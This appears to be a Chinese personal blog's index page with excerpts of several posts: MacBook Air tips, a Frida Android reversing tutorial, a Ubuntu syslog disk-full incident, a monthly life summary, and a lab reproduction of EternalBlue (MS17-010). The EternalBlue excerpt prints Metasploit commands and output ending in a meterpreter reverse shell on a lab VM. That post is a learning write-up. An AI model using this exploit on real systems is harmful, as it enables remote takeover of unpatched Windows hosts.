使用三周MacbookAir后的简单总结

在五月月初购入了MacbookAir M4 15+512 天蓝色,国补+学生认证,在京东花了6999.20,没有翻车,后续订了一年的AppleCare+花了599。也是第一次体验到MacOs,甚是喜欢。 之前用了一年多的Ubuntu作为主力系统,现在突然转到新的系统也还好,很快就适应了,因为Mac打开终端还是熟悉的zsh,还有可以安装Homebrew来管理软件包。 简单的总结一下我在使用过程中的问题和解决方案,以及个人觉得很好用的地方。 macbookAir替我解决的问题: 减少背包重量。 缓解续航焦虑,提升工作效率,随用随开。 屏幕刘海遮挡导致菜单栏图标显示不全 这里可以用Ice来菜单栏的收起展开 或者解决刘海,通过让刘海平行的区域都变为黑色Mac App Store 上的“Say No to Notch” 当然还有其他的方案,可以参考这个文章MacBook 刘海(Notch)增强工具推荐 桌面小组件 在AppStore可以安装iPhone和iPad的软件,我下载了不背单词、倒数日、Wakeup课程表。 这些软件的小组件放到桌面上可以说是很方便。 专业课软件如何使用? 首先是常用的开发软件,几乎都是支持多平台的。不支持的的用win11Arm虚拟机来实现。 win11Arm有兼容层能够运行x86程序。上课的时候用思科模拟器没有问题,在计算机组成原理的时候用到Quarts也能正常运行,但是下载程序到试验箱的时候,usb-blaster驱动无法安装,需要在github下载usb-blaster(arm)驱动手动安装。然后通过TypeC转USB的转接头连接到Mac,然后把USB给到win11虚拟机。 触控板or鼠标 如果接鼠标的话,很别扭,安装个Mac Mouse Fix 会习惯。 用了Mac的触控板之后,有点不想用鼠标了。。 常用软件 终端 Tabby(开源终端,好用) 虚拟机 VMware Fusion(免费,下载入口非常难找) Parallels Desktop(付费,融合模式确实好用,无缝使用windows,学生价格¥248一年标准版) 安卓模拟器 BlueStacks Air (免费) Docker管理 Orbstack(免费) 多设备同步 Syncthing(配合wireguard使用) 远程控制 Mac App Store 上的“Windows App” Windows远程控制软件 RSS阅读 Fluent Reader on the Mac App Store(免费) 剪贴板管理器 p0deje/Maccy: Lightweight clipboard manager for macOS 压缩包解压 The Unarchiver | Top Free Unarchiving Software for macOS 浏览器 Microsoft Edge(密码都存在这里,懒得换了) Arc from The Browser Company(非常优雅的浏览器) 开发 JetBrains系列(学生认证免费 Vscode 微信开发者工具(小程序一直不知道做什么,年审都没审 Github Desktop(图形化git,用不习惯hhh 笔记 Obsidian - Sharpen your thinking(yyds Notion(学生认证计划 优化使用体验 Mac Mouse Fix 优化鼠标使用 Ice 菜单栏管理 Mac App Store 上的“Say No to Notch” 隐藏屏幕刘海 共享 App Store 上的“小米互联服务” 能控制小米手机和文件互传 目前差不多就这点软件了。好多终端CLI工具其实也很不错,抽空整理一下。 ...

May 21, 2025 · 1 min · Yalois

内网渗透日记之永恒之蓝MS17-010

介绍 永恒之蓝漏洞存在于Windows SMB v1协议的处理过程中,具体是在处理SMB v1请求时发生的漏洞。攻击者可以利用该漏洞在目标系统上执行任意代码。通过扫描开放445端口的Windows机器,攻击者可以在无需用户操作的情况下,植入勒索软件、远程控制木马等恶意程序。 编号:CVE-2017-0146 微软漏洞编号:MS17-010 影响范围 Windows XP、 Windows Server 2003. Windows Vista、Windows Server 2008、 Windows 7. Windows Server2008 R2、Windows 8.1、Windows Server 2012. Windows10、Windows Server 2012 R2、Windows Server 2016 原文链接:https://blog.csdn.net/weixin_55811105/article/details/115804701 复现环境搭建 下载 Windows Server2008 R2,https://www.imsdn.cn/windows-server/windows-server-2008-r2/,然后在vmware安装。 复现 msfconsole search ms17 use exploit/windows/smb/ms17_010_eternalblue set payload set RHOSTS= set LPORTS= run/exploit search ms17 msf6 > use exploit/windows/smb/ms17_010_eternalblue [*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp msf6 exploit(windows/smb/ms17_010_eternalblue) > show options Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), see https://do cs.metasploit.com/docs/using-metas ploit/basics/using-metasploit.html RPORT 445 yes The target port (TCP) SMBDomain no (Optional) The Windows domain to u se for authentication. Only affect s Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 tar get machines. SMBPass no (Optional) The password for the sp ecified username SMBUser no (Optional) The username to authent icate as VERIFY_ARCH true yes Check if remote architecture match es exploit Target. Only affects Wi ndows Server 2008 R2, Windows 7, W indows Embedded Standard 7 target machines. VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Serv er 2008 R2, Windows 7, Windows Emb edded Standard 7 target machines. Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thre ad, process, none) LHOST 172.16.111.129 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic Target View the full module info with the info, or info -d command. msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 172.16.111.134 RHOSTS => 172.16.111.134 msf6 exploit(windows/smb/ms17_010_eternalblue) > run [*] Started reverse TCP handler on 172.16.111.129:4444 [*] 172.16.111.134:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [+] 172.16.111.134:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit) [*] 172.16.111.134:445 - Scanned 1 of 1 hosts (100% complete) [+] 172.16.111.134:445 - The target is vulnerable. [*] 172.16.111.134:445 - Connecting to target for exploitation. [+] 172.16.111.134:445 - Connection established for exploitation. [+] 172.16.111.134:445 - Target OS selected valid for OS indicated by SMB reply [*] 172.16.111.134:445 - CORE raw buffer dump (51 bytes) [*] 172.16.111.134:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2 [*] 172.16.111.134:445 - 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard [*] 172.16.111.134:445 - 0x00000020 37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63 7601 Service Pac [*] 172.16.111.134:445 - 0x00000030 6b 20 31 k 1 [+] 172.16.111.134:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 172.16.111.134:445 - Trying exploit with 12 Groom Allocations. [*] 172.16.111.134:445 - Sending all but last fragment of exploit packet [*] 172.16.111.134:445 - Starting non-paged pool grooming [+] 172.16.111.134:445 - Sending SMBv2 buffers [+] 172.16.111.134:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 172.16.111.134:445 - Sending final SMBv2 buffers. [*] 172.16.111.134:445 - Sending last fragment of exploit packet! [*] 172.16.111.134:445 - Receiving response from exploit packet [+] 172.16.111.134:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [*] 172.16.111.134:445 - Sending egg to corrupted connection. [*] 172.16.111.134:445 - Triggering free of corrupted buffer. [*] Sending stage (203846 bytes) to 172.16.111.134 [+] 172.16.111.134:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 172.16.111.134:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 172.16.111.134:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [*] Meterpreter session 1 opened (172.16.111.129:4444 -> 172.16.111.134:49178) at 2025-04-19 12:58:14 -0400 meterpreter > help 很多命令可以去使用。。。 ...

April 19, 2025 · 3 min · Yalois

安卓逆向——从0学习Frida(配合FridaLab)

一年前还是会一点的,过了这么久忘了挺多,重新学一下。写一个博客来记录,往后也可以给学弟学妹作为参考。 0.基础配置 安装配置Android模拟器 本文使用MuMu模拟器-https://mumu.163.com/。 在主页下载之后,安装打开。 在设置中打开root权限 勾选之后重启模拟器。 通过adb连接模拟器 打开文件所在位置,找到自带的adb(就不用去额外下载了) 在这里目录下打开cmd,Shift+鼠标右键进入终端。 直接在cmd调用是没有的,可以把adb加到环境变量里 添加完之后就能在cmd随时随地调用了。 Q:MuMu模拟器如何启动adb调试? A:官方文档https://mumu.163.com/help/20230214/35047_1073151.html, 从官方文档可以知道,可通过模拟器右上角菜单-问题诊断,获取ADB调试端口。 在终端执行adb connect 127.0.0.1:16385 连接成功之后就可以用adb命令来操作虚拟机了。 默认一般是16384端口,注意自己的配置。 常用的adb命令 adb devices #列出当前连接的所有设备。 adb install <path_to_apk> #将指定的APK文件安装到设备上。 adb shell #进入设备或模拟器的Linux shell环境,可以执行各种Linux命令。 adb push <本机路径> <模拟器路径> #把电脑上的文件传到模拟器上。 adb pull <模拟器路径> <本机路径> #把模拟器上的文件下载到电脑上。 adb push example.txt /sdcard/ #把当前目录的example.txt传到/sdcard/目录下。 先把模拟器打开放一边。 Frida的安装和配置 Q: 什么是Frida? A: Frida 是一款功能强大的动态代码插桩工具(Dynamic Instrumentation Toolkit),主要用于逆向工程、安全分析、漏洞挖掘以及应用程序的运行时调试。它通过注入脚本到目标进程的内存中,允许开发者和安全研究人员动态修改、监控和调试应用程序的行为,支持多种平台(Android、iOS、Windows、macOS、Linux 等)和编程语言(Java、C/C++、Objective-C、Swift、Python 等)。 ...

April 14, 2025 · 4 min · Yalois

记一次由Ubuntu系统日志引发的存储雪崩

问题出现 事情是这样的,4.5号晚我在写没写完的三月总结,系统突然提示存储空间不足,很奇怪,明明之前还有七八十个G的。难道是中木马了? 然后紧急保存文章,但是因为0字节可用,文章直接消失了。md文件直接显示0字节。我悲痛万分,开始排查。 占用排查 因为好久没有登陆tg了,就这次登录出问题了,还以为是tg的聊天记录太多了,然后删除了好多,发现并没有什么用。 软件确实也没啥奇怪的,今晚还安装了tradingview但是连不上网就卸载了。 然后去检测磁盘的空间,使用dust这个CLI应用,算是du命令的升级版。还有看了一下Ubuntu系统自带的系统占用分析器。 最终锁定在/var/log/syslog这个文件,整整106G。 然后我把这个日志mv到了我的硬盘里,先让系统恢复正常,准备去分析。 恢复typora内容 写了这么久的博客突然消失,挺难过的。还在想重写一遍又得花大量时间,去网上搜了搜typora的崩溃恢复。 还真找到了!https://blog.csdn.net/m0_51360693/article/details/120458414 在偏好设置里有个恢复为保存的草稿。 太好了!!内容都在,typora这会员没有白买!!! 遇到问题一定要保持冷静,尽力去想办法恢复,不要自暴自弃。 文档损坏的时候,我整个人都陷入低迷状态,很无力,还好我抱着试一试的心态去找解决方案而不是摆烂。 不要被情绪控制。 日志分析 刚才是给大文件挪出来了,需要具体分析,但是文件太大了,没法直接预览。 用grep命令正则匹配某天的日志输出再查看。 grep -E '^2025-04-05' ../syslog > 04-05.log 发现重定向的文件很大,先中断。 再看一下昨天的日志grep -E '^2025-04-05' ../syslog > 04-04.log,这个日志只有1.5M。 日志锁定在04-05,导出一部分进行编辑。 看20000行和30000行,都是这个报错。看时间戳,确实是这个日志一直报错导致的syslog爆满。 真相大白 原因是我安装的tradingview没有网络套接字权限,一直报错Permission denied。报错频率很高,不停往syslog写入,写了几十个G,导致磁盘爆满。 具体原因在google上找到了同类问题。 https://community.brave.com/t/syslog-overflow/50248 和snap命令有关。 problem resolved, The problem was caused through the improper removal of brave application with the us of snap command. snap purge brave removes brave without disconnecting it from the kernel, should of run the obvious snap remove brave. ...

April 6, 2025 · 1 min · Yalois

🌿三月总结|慢慢变好 < 2025

好久没写生活类博客了,三月底了,简单的总结一下吧 三月初就开学了,到学校回到匆忙的状态。 购入影石AcePro2 挺无聊的,想要买点东西玩。Oppo Watch X2刚出没多久,很心动,想要买。于是我向我的朋友说了我的想法,我的朋友点醒了我,确实花两千多买个手表对我来说不是很必要。 然后没过几天,在抖音上刷到了影石AcePro2的视频,那些鲜活的画面给了我不一样的感觉。于是我决定,买! 这个学期忙完之后,来不及休息,紧接着就是为期半年的备考专升本(专升本也算是第二次高考吧)。我要用这个相机来拍一些vlog,虽然我的生活不是很精致,甚至有时候很糟糕。。。但是记录一下忙碌生活的碎片,几年后翻出来看看或许会有不一样的感受。 其实高中就想要买相机拍vlog了,财力不足。现在想起来还是挺遗憾的,好多东西都没有记录下来。 投资理财 寒假最后几周是每天打cs,租各种各样的饰品玩。我也是比较关注cs市场的,cs的市场也是挺有意思,今年过年是m4a4大涨。那些提前囤货的也是赚了一笔。我突然意识到,我每天打游戏打的天昏地暗,不如去学一学理财,也算是一种提升。 于是就跟着网上的视频,了解了一下基金,买了一部分,发现基金还是太保守了。去学合约,杠杆,玩着玩着就失去了理智,欲望被杠杆无限放大,回想起当时的场景,随着K线的起伏,情绪忽高忽低,到爆仓的时候从屏幕中抽离出来,无力的靠在墙上,看向时间,不知不觉已经过去几个小时了。本来三月的生活费还是挺多的,可以过得富裕一点,被我霍霍一部分之后直接勒紧裤腰带过日子了。 但是基金还是小赚了一笔。风险相对于还是小一点。 寻找内心的宁静 最近一段时期,一直就很浮躁,控制不住的思绪,很难真正的平静下来。我学着短暂的在路上停留,去图书馆呆几个小时去寻找内心的宁静。 寒假在家开了微信读书的会员,开学又续费了一个月。但是平常给自己看书的时间还是挺少的。 最近在看两本书,《当下的力量》和《查拉图斯特拉如是说》。 《查拉图斯特拉如是说》是有点深奥(对我来说),之前是结合别人的书评视频看的,方便理解。想要自己从中有所感悟还是得细品,所以进度很慢。 《当下的力量》我强烈推荐,最开始看的时候,明显的能够感受到书籍给予的力量。但是现在还没看完,一般是有空的时候抽出来一两个小时看一章。简单的引用几段划线的句子感受一下! 小我的需求是无止境的。它感到自己很脆弱,容易受到威胁,所以它一直生活在一种恐惧和缺乏的状态中。一旦你了解了这一点,你就不需要探索它所有的表现形式,也没必要将它转化成复杂的个人问题。当然,小我喜欢你这样做。它通常会寻找一种依托以便加强支持它虚幻的自我感,并且总是将自己和你的问题联系在一起。对于大部分人来说,这就是他们的自我感觉与他们的问题紧密联系在一起的原因。一旦这种情形发生了,他们最不愿做的一件事就是从他们的问题中解脱出来,因为这意味着自我感的丧失。所以,小我喜欢你无意识地大量投资在痛苦和苦难中。 当你与思维认同时,你就陷入了时间的陷阱:你会不由自主地完全生活在对过去的回忆和对未来的期待之中。这样你的心思会完全被过去和未来占据,而不愿意接纳当下时刻,并容许它存在。过去可以赋予你一个身份,而未来代表了解脱的希望或任何一种形式的满足,因此你会强迫性地认同它们,但实际上这两者都是幻象。 然而,如果你过于注重目标,或许因为你在寻找幸福或成就,成为一个更圆满的自我感,这时你就没有在关注当下了。当下失去了固有的价值,而沦为通向未来的踏脚石。这样钟表时间就变成了心理时间。这时,你生命的旅程不再是一场奇妙的探险,它变成了一个为了达到目标、获得成就的强迫性需要。你不会再看到路边的花朵或闻到它的芬芳,也不会觉察到存在于当下的围绕着你生命的美丽和奇迹。 过去发生的一些事情没按照你的意愿来发生,你仍然在抗拒过去所发生的事情,而你现在又在抗拒当下的本然(what is)。促使你不断向前迈进的是希望,但是希望会使你将注意力集中在未来之上,而这种对未来的关注会促使你否定当下,因此造成你的不快乐。 比赛 和学长参加了第十八届全国大学生信息安全竞赛(创新实践能力赛)暨第二届长城杯铁人三项赛(防护赛)半决赛(天津赛区),在天津理工大学举办。 比赛前一周,在实验室努力了几天,Q1ngchuan带我用春秋云境打了几个靶场。 上午是AWDP,下午是ISW(综合渗透)。 最终拿到了一等奖,但是名次还差一点,没有进大学生信息安全竞赛的决赛,但是进了长城杯铁人三项赛的决赛。 用AcePro2拍了挺多视频的。 贴两张照片 社团校赛 举办了网安社团2024级的第二次校赛。犯了个小错误——学长给了一道web题目,我没传附件。QAQ,My Fault。 因为是专科,这学期之后就没有时间去带24级的同学学习,要尽快把知识传承下去。。。压力还是蛮大的。 春天 春天来了,万物复苏,感觉自己略微有点活过来了,感知能力也提升了。 学校的花开了好多,我去年竟然没有注意到!还好今年发现了,拍了不少照片。虽然质量不是很好,但是还是要发出来。 运气不太好 这个月总是有好多突发的倒霉事,隔三差五破防。受到打击之后,也明白了好多东西。 一点点破碎,一点点重构。成为更好的自己。 活着更应注重生命的过程。 这里想要引用《查拉图斯特拉如是说》的一句话。 人之所以伟大,乃在于他是桥梁而不是目的:人之所以可爱,乃在于他是过渡和没落。

March 31, 2025 · 1 min · Yalois